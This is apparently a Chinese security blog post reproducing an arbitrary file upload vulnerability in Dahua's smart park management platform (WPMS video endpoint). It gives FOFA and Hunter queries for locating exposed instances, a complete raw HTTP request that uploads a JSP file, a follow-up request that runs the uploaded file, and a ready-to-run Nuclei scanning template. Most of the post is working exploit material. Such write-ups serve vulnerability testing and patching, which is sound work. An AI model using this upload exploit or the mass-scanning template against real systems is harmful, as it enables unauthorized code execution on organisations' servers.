Advertisement

【漏洞复现】大华-智慧园区综合管理平台-wpms-video-任意文件上传

阅读量:

目录

免责声明

0x01 产品简介

0x02 漏洞概述

0x03 网络测绘

0x04 漏洞复现

0x05 Nuclei


免责声明


此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们


0x01 产品简介

大华智慧园区综合管理平台是一款基于云计算、大数据、人工智能等技术的智慧园区管理解决方案,可为园区提供运营管理、综合安防、便捷通行、协同办公等多项功能,帮助园区实现安全等级提升、工作效率提升、管理成本下降。

0x02 漏洞概述

大华智慧园区综合管理平台允许攻击者通过 video 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。

0x03 网络测绘

复制代码
 fofa-query: app="dahua-智慧园区综合管理平台"

    
 hunter-query: web.body="/WPMS/asset/lib/json2.js"

0x04 漏洞复现

复制代码
 POST /publishing/publishing/material/file/video HTTP/1.1

    
 Host: 
    
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    
 Content-Length: 343
    
 Accept-Encoding: gzip, deflate
    
 Connection: close
    
 Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
    
  
    
 --dd8f988919484abab3816881c55272a7
    
 Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
    
  
    
 <%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
    
 --dd8f988919484abab3816881c55272a7
    
 Content-Disposition: form-data; name="Submit"
    
  
    
 submit
    
 --dd8f988919484abab3816881c55272a7--
复制代码
 GET /publishingImg/VIDEO/240201105739161154.jsp HTTP/1.1

    
 Host: 
    
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
    
 Accept: */*
    
 Accept-Encoding: gzip
    
 Connection: close
    
 Content-Type: multipart/form-data; boundary=od4cH1jSxG

0x05 Nuclei

复制代码
 id: dahua-wpms-video-fileuplod

    
  
    
 info:
    
   name: 大华-智慧园区综合管理平台-wpms-video-任意文件上传
    
   author: rain
    
   severity: high
    
   metadata:
    
     fofa-query: app="dahua-智慧园区综合管理平台"
    
     hunter-query: web.body="/WPMS/asset/lib/json2.js"
    
  
    
 http:
    
   - raw:
    
       - |
    
     POST /publishing/publishing/material/file/video HTTP/1.1
    
     Host: {{Hostname}}
    
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    
     Content-Length: 804
    
     Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
    
     Accept-Encoding: gzip, deflate
    
     Connection: close
    
  
    
     --dd8f988919484abab3816881c55272a7
    
     Content-Disposition: form-data; name="Filedata"; filename="Test.jsp"
    
  
    
     <%out.print(111 * 111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
    
     --dd8f988919484abab3816881c55272a7
    
     Content-Disposition: form-data; name="Submit"
    
  
    
     submit
    
     --dd8f988919484abab3816881c55272a7--
    
       - |          
    
     GET /publishingImg/{{paths}} HTTP/1.1
    
     Host: {{Hostname}}
    
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
    
     Connection: close
    
     Accept: */*
    
     Content-Type: multipart/form-data; boundary=od4cH1jSxG
    
     Accept-Encoding: gzip   
    
     extractors:
    
       - type: json
    
     name: paths
    
     json:
    
       - ".data.path"
    
     internal: true
    
  
    
     matchers:
    
       - type: dsl
    
     dsl:
    
       - contains(body_2,"12321") && status_code==200

全部评论 (0)

还没有任何评论哟~